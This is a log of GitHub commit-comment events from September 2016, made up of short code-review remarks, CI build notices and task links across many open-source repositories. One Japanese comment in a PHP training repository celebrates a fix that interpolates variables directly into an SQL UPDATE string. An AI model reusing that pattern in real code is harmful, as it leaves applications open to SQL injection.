{"id":"4529324883","type":"CommitCommentEvent","actor":{"login":"asciimoo"},"repo":{"name":"asciimoo/searx"},"payload":{"comment":{"id":18932676,"position":null,"line":null,"path":null,"commit_id":"ce371f766a724bae26acb2221d0e1daef8acad5b","created_at":"2016-09-07T18:07:09Z","updated_at":"2016-09-07T18:07:09Z","body":"@GreenLunar : https://twitter.com/Searx_engine/status/772881128579530752"}},"created_at":"2016-09-07T18:07:09Z"}
{"id":"4529325847","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":18932680,"position":51,"line":205,"path":"languagetool-standalone/src/main/java/org/languagetool/gui/LanguageToolSupport.java","commit_id":"f08b52c0152241aa5178e8249149a26a16b625ac","created_at":"2016-09-07T18:07:20Z","updated_at":"2016-09-07T18:07:20Z","body":"This is a set of `CategoryId`s but `common` is a set of `String`s, so this won't work?"}},"created_at":"2016-09-07T18:07:20Z"}
{"id":"4529326391","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932681,"position":27,"line":48,"path":"examples/static_triage_example.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:07:27Z","updated_at":"2016-09-07T18:07:27Z","body":"There's no such field on the CybOX 3.0 File Object - I think we should probably make this another custom extension. E.g., \"extended_properties\":{\"maec-packer-list\":[...packers...]}"}},"created_at":"2016-09-07T18:07:27Z"}
{"id":"4529329576","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18932688,"position":87,"line":91,"path":"styles/album.css","commit_id":"31efff16ac1d1a01518d356d2e662023cea4c281","created_at":"2016-09-07T18:08:07Z","updated_at":"2016-09-07T18:08:07Z","body":"Not sure, I will fix it."}},"created_at":"2016-09-07T18:08:07Z"}
{"id":"4529330250","type":"CommitCommentEvent","actor":{"login":"avengerweb"},"repo":{"name":"LaravelDaily/quickadmin"},"payload":{"comment":{"id":18932690,"position":8,"line":16,"path":"src/routes.php","commit_id":"18c84bedc961430e85eccaad7490e157076303f2","created_at":"2016-09-07T18:08:15Z","updated_at":"2016-09-07T18:08:15Z","body":"Add here \r\n'as'         => config('quickadmin.route'). \".\"\r\nafter remove prefix I need to rewrite all alreday generated files, it bad, we need something like \"admin\" prefix\r\n\r\n"}},"created_at":"2016-09-07T18:08:15Z"}
{"id":"4529331057","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18932695,"position":217,"line":0,"path":"src/web/js/trove/d3-lib.js","commit_id":"dc515df3593b75bd82747dc579c1cde873e1fcb1","created_at":"2016-09-07T18:08:24Z","updated_at":"2016-09-07T18:08:24Z","body":"Yeah, see my comment below."}},"created_at":"2016-09-07T18:08:24Z"}
{"id":"4529333100","type":"CommitCommentEvent","actor":{"login":"fabienDaou"},"repo":{"name":"MaximeGILLET/Quotes"},"payload":{"comment":{"id":18932705,"position":null,"line":null,"path":null,"commit_id":"b9a4ddfca637c8d72ecea2131785d7080cdf4447","created_at":"2016-09-07T18:08:49Z","updated_at":"2016-09-07T18:08:49Z","body":"Rofl... Il ya aucune raison d'en faire des classes et des méthodes statiques."}},"created_at":"2016-09-07T18:08:49Z"}
{"id":"4529334647","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18932708,"position":null,"line":null,"path":null,"commit_id":"804d83ccf5a905828a37dd67d30149b364304d6b","created_at":"2016-09-07T18:09:07Z","updated_at":"2016-09-07T18:09:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;1bWChLlG&#x2F;22-add-base-function-and-this-function\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add &#x60;base&#x60; function and &#x60;this&#x60; function</a>"}},"created_at":"2016-09-07T18:09:07Z"}
{"id":"4529341793","type":"CommitCommentEvent","actor":{"login":"guidoignacio"},"repo":{"name":"David256/ChatBotTelegram"},"payload":{"comment":{"id":18932725,"position":null,"line":null,"path":null,"commit_id":"f8833f33b5ae7bdce094efaa2ffab76b07020794","created_at":"2016-09-07T18:10:28Z","updated_at":"2016-09-07T18:10:28Z","body":"Gracias por la corrección!!! Tenés algun grupo en telegram sobre este bot?"}},"created_at":"2016-09-07T18:10:28Z"}
{"id":"4529342387","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18932726,"position":null,"line":null,"path":null,"commit_id":"4256f72aaf5c4b0db945e041533ced4b195a3478","created_at":"2016-09-07T18:10:35Z","updated_at":"2016-09-07T18:10:35Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Tdd78CcI&#x2F;21-add-media-group\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add media group</a>"}},"created_at":"2016-09-07T18:10:35Z"}
{"id":"4529347679","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18932739,"position":null,"line":null,"path":null,"commit_id":"b918ce9facfd6eeddbde77dc8723d506a2561fa4","created_at":"2016-09-07T18:11:36Z","updated_at":"2016-09-07T18:11:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;nOdpBCtg&#x2F;20-add-font-group\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add font group</a>"}},"created_at":"2016-09-07T18:11:36Z"}
{"id":"4529348993","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18932743,"position":null,"line":null,"path":null,"commit_id":"fe34c95ffbd4f03c3d446c84e3b75f415d0d0981","created_at":"2016-09-07T18:11:51Z","updated_at":"2016-09-07T18:11:51Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;KSZkqBGt&#x2F;19-move-component-group-and-color-group-into-core-group\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Move component group and color group into core group</a>"}},"created_at":"2016-09-07T18:11:51Z"}
{"id":"4529350531","type":"CommitCommentEvent","actor":{"login":"veronikaslc"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18932748,"position":94,"line":118,"path":"components/family-studies/api/src/main/java/org/phenotips/studies/family/listener/FamilyDeletingListener.java","commit_id":"bf592492e7e58e0ac9cc9f45e7a886d96a46be68","created_at":"2016-09-07T18:12:11Z","updated_at":"2016-09-07T18:12:11Z","body":"Amended the commit."}},"created_at":"2016-09-07T18:12:11Z"}
{"id":"4529354811","type":"CommitCommentEvent","actor":{"login":"MrRiegel"},"repo":{"name":"MrRiegel/Storage-Network"},"payload":{"comment":{"id":18932761,"position":11,"line":29,"path":"src/main/java/mrriegel/storagenetwork/blocks/BlockConnectable.java","commit_id":"db5bd71fdf16bba58a2fcc5f82b5c364e6419d68","created_at":"2016-09-07T18:13:00Z","updated_at":"2016-09-07T18:13:00Z","body":"no, cause I don't know the position.\r\nDo you actually know why I am checking for air?"}},"created_at":"2016-09-07T18:13:00Z"}
{"id":"4529356598","type":"CommitCommentEvent","actor":{"login":"miclovich"},"repo":{"name":"miclovich/email-router"},"payload":{"comment":{"id":18932763,"position":null,"line":null,"path":null,"commit_id":"9afdb08f557eb1ead59e09e5b9f48cd6d1e6bb94","created_at":"2016-09-07T18:13:22Z","updated_at":"2016-09-07T18:13:22Z","body":"@chieakiba check out this before our pairing session. I hope it points you in the right direction. If not, we'll discuss this."}},"created_at":"2016-09-07T18:13:22Z"}
{"id":"4529364003","type":"CommitCommentEvent","actor":{"login":"canitzp"},"repo":{"name":"MrRiegel/Storage-Network"},"payload":{"comment":{"id":18932777,"position":11,"line":29,"path":"src/main/java/mrriegel/storagenetwork/blocks/BlockConnectable.java","commit_id":"db5bd71fdf16bba58a2fcc5f82b5c364e6419d68","created_at":"2016-09-07T18:14:49Z","updated_at":"2016-09-07T18:14:49Z","body":"no idk, I only have some trouble with my mods while I checked for Blocks.AIR instead of world.isAir, so I commented it "}},"created_at":"2016-09-07T18:14:49Z"}
{"id":"4529366832","type":"CommitCommentEvent","actor":{"login":"yuyichao"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18932787,"position":null,"line":null,"path":null,"commit_id":"8db40db6092e37d04160d80a6cd281a888a30e69","created_at":"2016-09-07T18:15:21Z","updated_at":"2016-09-07T18:15:21Z","body":"There's also `jl_get_frame_addr`."}},"created_at":"2016-09-07T18:15:21Z"}
{"id":"4529372214","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18932797,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T18:16:21Z","updated_at":"2016-09-07T18:16:21Z","body":"This seems stong! Good luck for LTC!\r\n\r\nOn remark:\r\nyou can remove the condition \r\n&& (  captureOrPromotion\r\n\t\t  || givesCheck\r\n\t\t  || pos.advanced_pawn_push(move)\r\n\t\t  )\r\n\t      \r\nbecause its the negation of following term of the previous if statement (using the rule of De Morgan) :\r\n&& !captureOrPromotion\r\n           && !givesCheck\r\n           && !pos.advanced_pawn_push(move))\r\n\r\n"}},"created_at":"2016-09-07T18:16:21Z"}
{"id":"4529373533","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18932800,"position":5,"line":8,"path":"app/views/feeds/_feed.html.erb","commit_id":"98936f3692e734cb3ae664350b1c7ba9bbba2bfc","created_at":"2016-09-07T18:16:36Z","updated_at":"2016-09-07T18:16:36Z","body":"I guess I didn't like the idea to make a separate commit for this change :D"}},"created_at":"2016-09-07T18:16:36Z"}
{"id":"4529375590","type":"CommitCommentEvent","actor":{"login":"dennisss"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18932802,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-07T18:17:00Z","updated_at":"2016-09-07T18:17:00Z","body":"@davids5, it only has MTD storage, and there is a debug port with SWD but no UART on it. Although, UART2/3 are exposed as pins, so I'll try and start a side nshterm on one of those.\r\n\r\nI don't think the sd card is the issue, as I had to hardcoded an override to sd card checking logic to get into the nshterm and then hardcoded the mavlink start command in rcS with no success.\r\n\r\nAlso, is it possible to route the system console to one of those UARTs temporarily (as it is done on the pixracer/pixhawk debug ports)? That would be helpful in seeing the full boot log."}},"created_at":"2016-09-07T18:17:00Z"}
{"id":"4529380345","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18932815,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T18:17:57Z","updated_at":"2016-09-07T18:17:57Z","body":"@locutus2 yes I guess you are right... thanks."}},"created_at":"2016-09-07T18:17:57Z"}
{"id":"4529382889","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18932823,"position":null,"line":null,"path":null,"commit_id":"8ec9fd0fbdfa0dee1c6c6b9c6d2e93625a84aaf1","created_at":"2016-09-07T18:18:27Z","updated_at":"2016-09-07T18:18:27Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KkrLNh2yTy-OpC7DwRp4yA"}},"created_at":"2016-09-07T18:18:27Z"}
{"id":"4529385273","type":"CommitCommentEvent","actor":{"login":"domenic"},"repo":{"name":"tc39/agendas"},"payload":{"comment":{"id":18932825,"position":null,"line":null,"path":null,"commit_id":"afcd0253c8c31ae695b039630e2bd5fabbc64eaf","created_at":"2016-09-07T18:18:55Z","updated_at":"2016-09-07T18:18:55Z","body":"Aww dang :("}},"created_at":"2016-09-07T18:18:55Z"}
{"id":"4529391760","type":"CommitCommentEvent","actor":{"login":"waynebeaton"},"repo":{"name":"mmilinkov/EPL"},"payload":{"comment":{"id":18932835,"position":36,"line":81,"path":"epl.html","commit_id":"d5ce8ae5a0f9377e25db8fa4d15128a1d5500918","created_at":"2016-09-07T18:20:08Z","updated_at":"2016-09-07T18:20:08Z","body":"Should you switch the order here? Executable code is defined in terms of Source Code; shouldn't we define Source Code first."}},"created_at":"2016-09-07T18:20:08Z"}
{"id":"4529397151","type":"CommitCommentEvent","actor":{"login":"kchristidis"},"repo":{"name":"corecode/fabric"},"payload":{"comment":{"id":18932852,"position":5,"line":30,"path":"consensus/simplebft/viewchange.go","commit_id":"365562e02ebeadb69a5b88e341c9083fb2d2ffa5","created_at":"2016-09-07T18:21:07Z","updated_at":"2016-09-07T18:21:07Z","body":"Not sure why you switched to a slice here? As you have noted as well, your P and Q structs will hold one item now that you're dropping watermarks."}},"created_at":"2016-09-07T18:21:07Z"}
{"id":"4529397675","type":"CommitCommentEvent","actor":{"login":"weiqsun"},"repo":{"name":"githubteacher/devs-september"},"payload":{"comment":{"id":18932855,"position":null,"line":null,"path":null,"commit_id":"8e3bfe96815502860d76bebb6341e5fbd08e246c","created_at":"2016-09-07T18:21:12Z","updated_at":"2016-09-07T18:21:12Z","body":"added a comment"}},"created_at":"2016-09-07T18:21:12Z"}
{"id":"4529404997","type":"CommitCommentEvent","actor":{"login":"ondrej-hosak"},"repo":{"name":"ondrej-hosak/las_control"},"payload":{"comment":{"id":18932869,"position":null,"line":null,"path":null,"commit_id":"c5b52c7de205e0f0711e0e3a0a3380b4c0697cf0","created_at":"2016-09-07T18:22:38Z","updated_at":"2016-09-07T18:22:38Z","body":"Ja to dal takto schvalne, aby se to dalo posilat pres copy & paste."}},"created_at":"2016-09-07T18:22:38Z"}
{"id":"4529405201","type":"CommitCommentEvent","actor":{"login":"JsonFreeman"},"repo":{"name":"JsonFreeman/semppl"},"payload":{"comment":{"id":18932870,"position":45,"line":87,"path":"nnRSA.wppl","commit_id":"8b86b70cd005973dd24a93708ed6992f54b6ea9d","created_at":"2016-09-07T18:22:40Z","updated_at":"2016-09-07T18:22:40Z","body":"Why 10?"}},"created_at":"2016-09-07T18:22:40Z"}
{"id":"4529408476","type":"CommitCommentEvent","actor":{"login":"JsonFreeman"},"repo":{"name":"JsonFreeman/semppl"},"payload":{"comment":{"id":18932878,"position":52,"line":93,"path":"nnRSA.wppl","commit_id":"8b86b70cd005973dd24a93708ed6992f54b6ea9d","created_at":"2016-09-07T18:23:17Z","updated_at":"2016-09-07T18:23:17Z","body":"The default appears to be adam. Why adam instead of gd?"}},"created_at":"2016-09-07T18:23:17Z"}
{"id":"4529411116","type":"CommitCommentEvent","actor":{"login":"TigerC10"},"repo":{"name":"rt2zz/redux-persist"},"payload":{"comment":{"id":18932884,"position":12,"line":30,"path":"src/persistStore.js","commit_id":"4d71468a8d12aaf84ad813fe9b3017ac1b59d7c1","created_at":"2016-09-07T18:23:46Z","updated_at":"2016-09-07T18:23:46Z","body":"@rt2zz - 👍  This resolves a bug with internet explorer, evidently IE was reporting an `err` as well as something in `restoredState`, but it was trying to handle `restoredState` before handling `err`.  This is more gooder."}},"created_at":"2016-09-07T18:23:46Z"}
{"id":"4529412591","type":"CommitCommentEvent","actor":{"login":"JsonFreeman"},"repo":{"name":"JsonFreeman/semppl"},"payload":{"comment":{"id":18932889,"position":23,"line":19,"path":"rsa.wppl","commit_id":"8b86b70cd005973dd24a93708ed6992f54b6ea9d","created_at":"2016-09-07T18:24:04Z","updated_at":"2016-09-07T18:24:04Z","body":"Why does the speaker take an utterance? Shouldn't the speaker take a world?"}},"created_at":"2016-09-07T18:24:04Z"}
{"id":"4529412937","type":"CommitCommentEvent","actor":{"login":"clebertsuconic"},"repo":{"name":"apache/activemq-artemis"},"payload":{"comment":{"id":18932890,"position":5,"line":379,"path":"artemis-rest/src/main/java/org/apache/activemq/artemis/rest/topic/SubscriptionsResource.java","commit_id":"5792fca9c7877430d27b1636ab60fa76099aab19","created_at":"2016-09-07T18:24:09Z","updated_at":"2016-09-07T18:24:09Z","body":"Right... I fixed it."}},"created_at":"2016-09-07T18:24:09Z"}
{"id":"4529415057","type":"CommitCommentEvent","actor":{"login":"ifokkema"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":18932892,"position":8,"line":131,"path":"src/changelog.txt","commit_id":"e3546348fc590c88a388957c4cfe3af0e79e4b2e","created_at":"2016-09-07T18:24:33Z","updated_at":"2016-09-07T18:24:33Z","body":"I know this is an old commit... but this doesn't belong here, does it? These improvements (and their issues) have already been listed in the changelog (you've added links to their PRs now). I'll revert it."}},"created_at":"2016-09-07T18:24:33Z"}
{"id":"4529416912","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18932899,"position":null,"line":null,"path":null,"commit_id":"a4e548f17f20be00b33e889cef6463b973a51fef","created_at":"2016-09-07T18:24:54Z","updated_at":"2016-09-07T18:24:54Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#FHk0GJi2RSSGOp1PwC_rUQ"}},"created_at":"2016-09-07T18:24:54Z"}
{"id":"4529418863","type":"CommitCommentEvent","actor":{"login":"davids5"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18932907,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-07T18:25:17Z","updated_at":"2016-09-07T18:25:17Z","body":"@dennisss \r\n\r\nSimple just set the nuttx console to usart 2 or 3.\r\n\r\nIn nuttx_v3 we have the ability in the top level cmake file to set a rom file system.\r\n\r\n```px4_nuttx_configure(HWCLASS m4 CONFIG nsh ROMFS y ROMFSROOT px4fmu_common)```\r\n\r\nFor your application you can create a very stripped down startup.  by creating a folder in ROMFS say \"crasyflies_uncommon\" and changing the value of the key word ROMFSROOT \r\n\r\n"}},"created_at":"2016-09-07T18:25:17Z"}
{"id":"4529421934","type":"CommitCommentEvent","actor":{"login":"bonii-xx"},"repo":{"name":"SlimeKnights/TinkersConstruct"},"payload":{"comment":{"id":18932913,"position":null,"line":null,"path":null,"commit_id":"9466eba928ac2918380e6e3ba97f80f431b3a127","created_at":"2016-09-07T18:25:52Z","updated_at":"2016-09-07T18:25:52Z","body":"Can you fix it? :3"}},"created_at":"2016-09-07T18:25:52Z"}
{"id":"4529424297","type":"CommitCommentEvent","actor":{"login":"bar"},"repo":{"name":"llvm-project/llvm-project"},"payload":{"comment":{"id":18932922,"position":null,"line":null,"path":null,"commit_id":"feb37561148294c1a362d6f4d49e5d11e6a1b7f7","created_at":"2016-09-07T18:26:19Z","updated_at":"2016-09-07T18:26:19Z","body":"@zmodem I don;t think you want to at handle me for that :)"}},"created_at":"2016-09-07T18:26:19Z"}
{"id":"4529424710","type":"CommitCommentEvent","actor":{"login":"iggy00"},"repo":{"name":"iggy00/iggy-s-thing"},"payload":{"comment":{"id":18932923,"position":null,"line":null,"path":null,"commit_id":"31988a685d9a64b942cd57e96738adbf5d894553","created_at":"2016-09-07T18:26:24Z","updated_at":"2016-09-07T18:26:24Z","body":"made the thing\r\n"}},"created_at":"2016-09-07T18:26:24Z"}
{"id":"4529426279","type":"CommitCommentEvent","actor":{"login":"johnjohndoe"},"repo":{"name":"MarcusWolschon/osmeditor4android"},"payload":{"comment":{"id":18932931,"position":null,"line":null,"path":null,"commit_id":"b8fd74ace0312ea5aad62db430646c411e8175b6","created_at":"2016-09-07T18:26:42Z","updated_at":"2016-09-07T18:26:42Z","body":"The script becomes somewhat more readable if you split it into multiple files. You can easily include other files with `apply from: \"path/to/other.gradle\"`."}},"created_at":"2016-09-07T18:26:42Z"}
{"id":"4529426501","type":"CommitCommentEvent","actor":{"login":"bar"},"repo":{"name":"llvm-project/llvm-project-submodule"},"payload":{"comment":{"id":18932932,"position":null,"line":null,"path":null,"commit_id":"151776702fef096957590d778650f561a62d4e97","created_at":"2016-09-07T18:26:44Z","updated_at":"2016-09-07T18:26:44Z","body":"@zmodem or this"}},"created_at":"2016-09-07T18:26:44Z"}
{"id":"4529427067","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18932934,"position":null,"line":null,"path":null,"commit_id":"1e6e905e1316184b763fe3b9532074373dd6194a","created_at":"2016-09-07T18:26:51Z","updated_at":"2016-09-07T18:26:51Z","body":"こちら、ご指摘ありがとうございます！\r\n\"UPDATE topics SET name='$nameafter' WHERE name='$namebefore'\"\r\nのように修正したら、更新されるようになりました！\r\n同様にしたらDELETEもできたので、リポジトリにプッシュしました。\r\n\r\nシングルではなくダブルクオートで囲まないと中の変数は有効にならないのですね。\r\n\r\n\r\n"}},"created_at":"2016-09-07T18:26:51Z"}
{"id":"4529427504","type":"CommitCommentEvent","actor":{"login":"bar"},"repo":{"name":"llvm-project/llvm"},"payload":{"comment":{"id":18932935,"position":null,"line":null,"path":null,"commit_id":"4a832664360a2e589a5de291ed25434edfdce1fa","created_at":"2016-09-07T18:26:56Z","updated_at":"2016-09-07T18:26:56Z","body":"@zmodem or even this :)"}},"created_at":"2016-09-07T18:26:56Z"}
{"id":"4529434371","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"HistoryAtState/hac"},"payload":{"comment":{"id":18932979,"position":null,"line":null,"path":null,"commit_id":"f312d7a64fd6f2f2063352eba28a20e98dabfd8f","created_at":"2016-09-07T18:28:17Z","updated_at":"2016-09-07T18:28:17Z","body":"@machalou Whoo hoo! "}},"created_at":"2016-09-07T18:28:17Z"}
{"id":"4529436362","type":"CommitCommentEvent","actor":{"login":"jswrenn"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18932986,"position":null,"line":null,"path":null,"commit_id":"598c0d8a2c19a81332df7b79d4ec44a351de1127","created_at":"2016-09-07T18:28:38Z","updated_at":"2016-09-07T18:28:38Z","body":"<a href=\"https://gfycat.com/UnripeLoneCentipede\">Video:<video poster=\"https://thumbs.gfycat.com/UnripeLoneCentipede-poster.jpg\" autoplay loop controls><source src=\"https://zippy.gfycat.com/UnripeLoneCentipede.webm\" type=\"video/webm\"><source src=\"https://zippy.gfycat.com/UnripeLoneCentipede.mp4\"type=\"video/mp4\"><img title=\"Sorry, your browser doesn't support HTML5 video.\" src=\"https://thumbs.gfycat.com/UnripeLoneCentipede-poster.jpg\"></video></a>"}},"created_at":"2016-09-07T18:28:38Z"}
{"id":"4529437050","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18932988,"position":5,"line":5,"path":"app/views/products/_product.html.erb","commit_id":"98936f3692e734cb3ae664350b1c7ba9bbba2bfc","created_at":"2016-09-07T18:28:47Z","updated_at":"2016-09-07T18:28:47Z","body":"I just thought that the category is more fit to be in the brief description of the product than the campaign name."}},"created_at":"2016-09-07T18:28:47Z"}
{"id":"4529441959","type":"CommitCommentEvent","actor":{"login":"jerone"},"repo":{"name":"joefitzgerald/etch-octicon"},"payload":{"comment":{"id":18932996,"position":26,"line":13,"path":"src/Octicon.js","commit_id":"0edf413822976adb9faf3bf107aaed08b251ec96","created_at":"2016-09-07T18:29:46Z","updated_at":"2016-09-07T18:29:46Z","body":"@joefitzgerald \r\n\r\nWouldn't `type` be more appropriate then `name` here... \r\nName gives me more the idea of giving the element a name with the name-attribute. Also type would be more inline with `<input/>`-tag as it defines the _type_ of Octicon.\r\n\r\n<small>Sorry for posting this here; an issue seemed overkill.</small>"}},"created_at":"2016-09-07T18:29:46Z"}
{"id":"4529442463","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18932997,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-07T18:29:52Z","updated_at":"2016-09-07T18:29:52Z","body":"TeamCity Chorus :: chorus-precise64-master Continuous [Build 2.6.665.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76534&buildTypeId=bt323) outcome was **SUCCESS**\nSummary: Tests passed: 937, ignored: 56 Build time: 00:18:10"}},"created_at":"2016-09-07T18:29:52Z"}
{"id":"4529444971","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18933000,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-07T18:30:24Z","updated_at":"2016-09-07T18:30:24Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.262.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76529&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:27:35"}},"created_at":"2016-09-07T18:30:24Z"}
{"id":"4529445122","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/buildtools"},"payload":{"comment":{"id":18933001,"position":14,"line":23,"path":"src/Microsoft.DotNet.Build.Tasks/PackageFiles/tool-runtime/project.json","commit_id":"42226639044761504a6aaaa8e8580359765c0de0","created_at":"2016-09-07T18:30:25Z","updated_at":"2016-09-07T18:30:25Z","body":"This change introduced dependency conflicts.  NETStandard.library includes the latest System.Net.Http, but this project explicitly references the stable one: 4.1.0 at line 19."}},"created_at":"2016-09-07T18:30:25Z"}
{"id":"4529445984","type":"CommitCommentEvent","actor":{"login":"bar"},"repo":{"name":"earl/llvm-mirror"},"payload":{"comment":{"id":18933003,"position":null,"line":null,"path":null,"commit_id":"7ca5c791f512cccd0e5cb0a86534262b7aaf39ac","created_at":"2016-09-07T18:30:34Z","updated_at":"2016-09-07T18:30:34Z","body":"@zmodem ohh man, more?"}},"created_at":"2016-09-07T18:30:34Z"}
{"id":"4529450442","type":"CommitCommentEvent","actor":{"login":"lawilli"},"repo":{"name":"PolymerElements/iron-form"},"payload":{"comment":{"id":18933009,"position":5,"line":454,"path":"iron-form.html","commit_id":"32cb3d6e48c2f58acbfc72760218cd45c05d0c13","created_at":"2016-09-07T18:31:26Z","updated_at":"2016-09-07T18:31:26Z","body":"Typo?"}},"created_at":"2016-09-07T18:31:26Z"}
{"id":"4529455337","type":"CommitCommentEvent","actor":{"login":"DavidLP"},"repo":{"name":"home-assistant/home-assistant.github.io"},"payload":{"comment":{"id":18933017,"position":32,"line":27,"path":"source/_components/pilight.markdown","commit_id":"fc17f1806544c2d63cfcaed42592b40f647835d9","created_at":"2016-09-07T18:32:24Z","updated_at":"2016-09-07T18:32:24Z","body":"The hyphen does not work. I checked with the actual development version."}},"created_at":"2016-09-07T18:32:24Z"}
{"id":"4529455608","type":"CommitCommentEvent","actor":{"login":"GreenLunar"},"repo":{"name":"asciimoo/searx"},"payload":{"comment":{"id":18933018,"position":null,"line":null,"path":null,"commit_id":"ce371f766a724bae26acb2221d0e1daef8acad5b","created_at":"2016-09-07T18:32:28Z","updated_at":"2016-09-07T18:32:28Z","body":"Oh, I forgot that this website exists...\r\n\r\n[List of Independent GNU social Instances](http://www.skilledtests.com/wiki/List_of_Independent_Statusnet_Instances)\r\n[GNU social](https://gnu.io/social/)\r\n#389"}},"created_at":"2016-09-07T18:32:28Z"}
{"id":"4529457683","type":"CommitCommentEvent","actor":{"login":"lawilli"},"repo":{"name":"PolymerElements/iron-form"},"payload":{"comment":{"id":18933025,"position":5,"line":454,"path":"iron-form.html","commit_id":"32cb3d6e48c2f58acbfc72760218cd45c05d0c13","created_at":"2016-09-07T18:32:54Z","updated_at":"2016-09-07T18:32:54Z","body":"I'm referring to \"when its its\""}},"created_at":"2016-09-07T18:32:54Z"}
{"id":"4529463260","type":"CommitCommentEvent","actor":{"login":"GabrielAmazonas"},"repo":{"name":"GabrielAmazonas/TheWebDeveloperBootcamp"},"payload":{"comment":{"id":18933041,"position":null,"line":null,"path":null,"commit_id":"45bf438d14b6dbfeac5ebf47b3f1095111f3d4e7","created_at":"2016-09-07T18:34:02Z","updated_at":"2016-09-07T18:34:02Z","body":"Section 4 - Lesson 25"}},"created_at":"2016-09-07T18:34:02Z"}
{"id":"4529463485","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18933044,"position":null,"line":null,"path":null,"commit_id":"6b6a4ecc2b6daf9d7ee34d5db178ca6248f7e1f8","created_at":"2016-09-07T18:34:05Z","updated_at":"2016-09-07T18:34:05Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;ug7T9WlQ&#x2F;15-rename-private-and-public-to-static-and-dynamic\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Rename private and public to static and dynamic</a>"}},"created_at":"2016-09-07T18:34:05Z"}
